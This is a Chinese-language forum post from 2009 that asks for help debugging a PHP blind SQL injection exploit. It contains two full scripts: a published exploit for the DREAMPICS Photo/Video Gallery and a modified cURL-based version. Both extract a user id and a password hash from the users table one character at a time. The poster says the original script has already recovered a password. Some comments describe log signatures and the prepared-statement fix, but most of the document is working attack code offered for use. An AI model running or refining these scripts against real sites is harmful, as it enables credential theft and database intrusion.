这代码有什么问题吗?帮忙看看谢谢~
本帖最后由 notask 于 2009-09-08 11:02:54 编辑
未修改的,可以正常运行,通过注入获取到密码
<?php
// Script as posted: a boolean-based blind SQL injection proof-of-concept.
// It appends SQL conditions to the URL given on the command line and infers one
// character at a time from differences in the length of the returned page.
// The comments describe what each step sends, so the traffic can be recognised
// in logs and the underlying flaw can be fixed.
// NOTE(review): the server-side cause is presumably a request parameter that is
// concatenated into a SQL statement; binding it as a typed parameter of a prepared
// statement removes the injection point. Confirm against the affected application.
// Defender's view: one run produces a long burst of GET requests to the same URL
// whose query string ends in "+and+...--". The repeated "ascii(substring((select"
// fragment is a stable string to match in access logs or WAF rules.

// Removes PHP's execution time limit (0 = unlimited) for this run.
ini_set("max_execution_time",0);
// Prints the author's banner and usage line; nothing is computed here.
print_r('
##############################################################################
#
# DREAMPICS Photo/Video Gallery Blind SQL Injection Exploit
#
# ---->>>> xoron <<<<<-----
# [email protected]
# XORON (c) 2009
#
# WARNING!: php xoron.php "http://www.xoronk1ng./[PATH]/index.php?fuseaction=gallery.viewPhotos&exhibition_id=13"
#
##############################################################################
');
// The rest runs only when a URL was passed as the first command-line argument.
if ($argc > 1) {
$url = $argv[1];
// $r: byte length of the page when an always-true condition is appended (baseline).
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
// $w: byte length of the page when an always-false condition is appended.
$w = strlen(file_get_contents($url."+and+1=0--"));
// $t: percentage difference between the two baselines; used below as the threshold
// for deciding whether a probe response looks like the "false" page.
$t = abs((100-($w/$r*100)));echo "\nPassword: ";
// 32 character positions are probed.
// NOTE(review): 32 characters restricted to digits and a-f suggests a hex digest
// such as MD5; the page does not say how the passwords are stored.
for ($j = 1; $j <= 32; $j++) {
// Candidate ASCII codes are stepped two at a time.
for ($i = 46; $i <= 102; $i=$i+2) {
// Jumps from 60 to 98, skipping the codes between the digit range and the
// lowercase letters.
if ($i == 60) {
$i = 98;
}
// Probe: is the ASCII code of character $j greater than $i? (%3E is a URL-encoded '>').
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--"));
// A length that deviates from the true baseline by about the threshold is treated
// as the condition having evaluated to false.
if (abs((100-($laenge/$r*100))) > $t-1) {
// Second probe with $i-1 decides between the two codes covered by this step.
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
// Setting the loop variable to its upper bound ends the inner loop for this position.
$i = 102;
}
}
}
}
?>
因为上面这个百次执行的,效率非常低,速度太慢,我叫人改了一下,但是改完之后,得出的密码都变成---------------------了奇怪,谁看下?这个是修改过之后的。。<?php
/**
 * Requests a URL with cURL and returns the size reported in the response headers.
 *
 * CURLOPT_NOBODY asks for a header-only response, CURLOPT_HEADER includes the
 * headers in the returned string, and CURLOPT_FOLLOWLOCATION follows redirects.
 * If curl_exec() fails, the function prints 'cURL failed' and ends the script.
 *
 * @param string $remoteFile URL to request; passed unchanged to curl_init().
 * @return mixed The value captured from a Content-Length header in the response.
 */
function get_remote_file_siz($remoteFile)
{
$ch = curl_init($remoteFile);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); //not necessary unless the file redirects (like the PHP example we're using here)
$data = curl_exec($ch);
curl_close($ch);
// Hard stop on transport failure; nothing is returned to the caller in that case.
if ($data === false) {
echo 'cURL failed';
exit;
} $contentLength = 'unknown';
$status = 'unknown';
// The status code is parsed here but is not used afterwards in this function.
if (preg_match('/^HTTP\/1\.[01] (\d\d\d)/', $data, $matches)) {
$status = (int)$matches[1];
}
if (preg_match('/Content-Length: (\d+)/', $data, $matches)) {
$contentLength = (int)$matches[1];
}
return $contentLength;
// The statement after the closing brace belongs to the script that follows: it removes
// PHP's execution time limit (0 = unlimited).
}ini_set("max_execution_time",0);
// Modified version as posted: the same boolean-based blind SQL injection probing,
// but every measurement goes through get_remote_file_siz() instead of downloading
// the page body. It reads the uid column first and then the password column.
// NOTE(review): the server-side fix is presumably the same as for any injection of
// this kind: bind the request parameter in a prepared statement rather than
// concatenating it into SQL. Confirm against the affected application.
// Defender's view: one run sends a long series of requests to a single URL whose
// query string ends in "+and+...--"; "ascii(substring((select" repeats in all of
// them and is a stable string to match in access logs or WAF rules.

// Prints the banner and usage line; nothing is computed here.
print_r('
##############################################################################
#
#123
#
#
# : Usage :
#php file.php "http://site/123.php?fid=11"
#
#
##############################################################################
');
// The rest runs only when a URL was passed as the first command-line argument.
if ($argc > 1) {
$url = $argv[1];
// $r: size reported for the always-true request; max(1, ...) keeps the divisor
// used below from being zero.
$r = max(1,get_remote_file_siz($url."+and+1=1--"));
echo "\nExploiting:\n";
// $w: size reported for the always-false request.
$w = get_remote_file_siz($url."+and+1=0--");
// $t: percentage difference between the two baselines, used as the decision threshold.
$t = abs((100-($w/$r*100)));
echo "id: ";
// Probes positions 1..30 of the uid value with a "!= 0" test and records in $count
// the first position whose response is treated as the "false" page.
for ($i=1; $i <= 30; $i++) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$i.",1))!=0--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
// Setting the loop variable to its upper bound ends this loop.
$i = 30;
}
}
// Reads the uid value one position at a time, for positions below $count.
for ($j = 1; $j < $count; $j++) {
// Candidate ASCII codes are stepped two at a time, here up to 122.
for ($i = 46; $i <= 122; $i=$i+2) {
// Jumps from 60 to 98, skipping the codes in between.
if ($i == 60) {
$i = 98;
}
// Probe: is the ASCII code of character $j greater than $i? (%3E is a URL-encoded '>').
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
// Second probe with $i-1 decides between the two codes covered by this step.
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
// Ends the inner loop for this position.
$i = 122;
}
}
}
echo "\nPassword: ";
// Same procedure for the password column: 32 positions, candidate codes up to 102.
// NOTE(review): 32 characters restricted to digits and a-f suggests a hex digest
// such as MD5; the page does not say how the passwords are stored.
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
// Ends the inner loop for this position.
$i = 102;
}
}
}
}
?>